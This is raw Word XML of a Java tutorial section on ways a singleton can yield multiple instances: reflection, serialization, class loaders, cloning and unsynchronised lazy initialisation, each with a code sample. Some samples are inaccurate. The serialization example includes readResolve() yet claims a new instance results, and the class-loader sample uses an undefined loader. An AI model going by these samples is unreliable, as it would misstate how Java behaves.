    <w:p w14:paraId="0536C1DB" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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n-static members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> belong to each instance of the class, and each object has its own copy of these members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D88A7" w14:textId="5AAEC383"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8B674E2">
          <v:rect id="_x0000_i1183" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="615676F0" w14:textId="0379B584" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc196307536"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we break the singleton pattern</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="5DCB0EF3" w14:textId="4B6588C2" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">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reaking the Singleton Pattern in Java can occur in several ways, either intentionally (for testing purposes or design flaws) or unintentionally due to poor implementation. Below are some common ways in which the Singleton pattern can be broken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52096787" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD58B6C"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ing reflection, you can instantiate a class even if its constructor is private, which violates the Singleton pattern. By accessing the private constructor, you can create multiple instances of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14527EDC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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3BD9827B"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lang.reflect.Constructor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F8A3E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C173308"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D90D4"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atic Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079BD1A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69586F1A"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB1E6D"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vate constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBAF73E"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2ABCF7C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14436B57"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7979B149"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9335B4"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468021B7"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C9A55D4"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB7285"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8C51D41" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFFFE4A"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throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CB0EC9"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ingleton s1 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30030DD0"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0035A169" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247DD924"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Break Singleton using reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B000310"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nstructor&lt;Singleton&gt; constructor = Singleton.class.getDeclaredConstructor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A823B88"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nstructor.setAccessible(true);  // Allow access to private constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11328529"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ingleton s2 = constructor.newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B2493"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2);  // New instance created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426FB76"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689B277"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B90357B"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e above example, even though the constructor of Singleton is private, we are able to create a new instance using reflection and break the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366076A4" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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Serialization and Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB44BF1"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e case of serialization (which converts an object into a stream of bytes), the Singleton pattern can be broken by creating a new instance during deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D238A2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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33D3A81F"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io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E57E1C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5423D1A3"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ingleton implements Serializable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E2F68"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atic Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD96C6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EE1CA6"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDC361"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vate constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD271F"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462A3A9" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572D443D"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FBAB0"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C9ECAB"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D894A57"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6F5CCDD"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC10B6E"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EE0704D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7340FEAE"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Object readResolve() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7748B5"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event breaking the Singleton during deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D0605"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604CC57B"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C40ED73" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E258F3"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throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B4C00"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ingleton s1 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F8127"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA9741" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E794340"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erialize the Singleton object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D15AF4A"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bjectOutputStream out = new ObjectOutputStream(new FileOutputStream("singleton.ser"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F276D6"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ut.writeObject(s1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C5B81F"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ut.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773568EE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57077369"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Deserialize and break the Singleton pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E37436"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bjectInputStream in = new ObjectInputStream(new FileInputStream("singleton.ser"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE1920"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ingleton s2 = (Singleton) in.readObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446D4D6"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C600B62" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA168D2"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2);  // A new instance is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F1F4C"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2A08CBD"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443F83E"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e above code, the deserialization of the object creates a new instance, which breaks the Singleton pattern. The readResolve() method can prevent this by returning the existing instance instead of creating a new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E97243C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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Multiple Class Loaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755F719"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Java, different class loaders can load the same class multiple times, creating different instances of the Singleton class. This can break the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F56A19" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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4CF43020"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE71CCE"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atic Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348FB3B" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DACB97"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C152CB"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vate constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2092282A"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21B94D2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172913A9"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3E5EE"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF8A364"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA11B8E"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2AAE377"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E50DA5"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E493C5F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9DE2A7"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throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CE7DA"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lassLoader classLoader1 = new MyClassLoader();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28275F1A"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lassLoader classLoader2 = new MyClassLoader();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978382C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640FADA6"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Load Singleton using two different class loaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885A5F3"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lass&lt;?&gt; singletonClass1 = classLoader1.loadClass("Singleton");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3C43A7"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lass&lt;?&gt; singletonClass2 = classLoader2.loadClass("Singleton");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC387C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0FA637"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ingleton s1 = (Singleton) singletonClass1.newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02687C87"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ingleton s2 = (Singleton) singletonClass2.newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DF3C6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FDDDA1"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2C4D38"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2);  // Different instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B2E1E"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7450765"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E398702"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case, by using multiple class loaders, you could potentially load different instances of the Singleton class, breaking the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD1EFC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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Cloning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A796C"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Singleton class implements Cloneable, the clone() method can be used to create a new instance, which breaks the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30EFD6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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396DC926"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ingleton implements Cloneable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA7991"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private static Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A68372" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140D891A"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6651785E"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vate constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83AAC1"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C3A8A92" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE308C9"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4E9B3"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F165A68"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47973494"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EC8E1B8"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87FC0D"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ADD5F02" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599292DC"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6718F888"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Object clone() throws CloneNotSupportedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440367DA"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super.clone();  // Allows cloning, which breaks Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3E5FE"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D8B2C45" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2E3B97"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throws CloneNotSupportedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0F8AF"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ingleton s1 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F410979"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D152DC4" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508984A1"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ingleton s2 = (Singleton) s1.clone();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B1F8D1"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2);  // New instance created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A34C15"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7AA9984"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6D05FA0"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y overriding the clone() method and allowing cloning, you can create a new instance of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F174EF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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Thread-Safety Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641FDFAC"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Singleton implementation is not thread-safe, it is possible for multiple threads to create multiple instances of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4A413" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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39A73788"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A32F2"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atic Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25516640" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECC7426"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4490B9E9"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vate constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38ECE4"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5E4F172" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0F7DC0"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5818B3"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB85EDE"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C74AB"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4B48E13"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB5375"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67D805A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B1D629"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3C71B817"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read t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B011FC"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ingleton s1 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAEE344"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72515EC6"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6ADBF2D"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read t2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BF4E5"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ingleton s2 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EBCFA"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E476C0"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2AC5282"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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E605E4"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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CCC4C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B682F5"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8CADAE1"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case, if getInstance() is not synchronized or does not use other thread-safety mechanisms (e.g., double-checked locking, volatile keyword), multiple threads may create separate instances, breaking the Singleton pattern.</w:t>
      </w:r>
    </w:p>
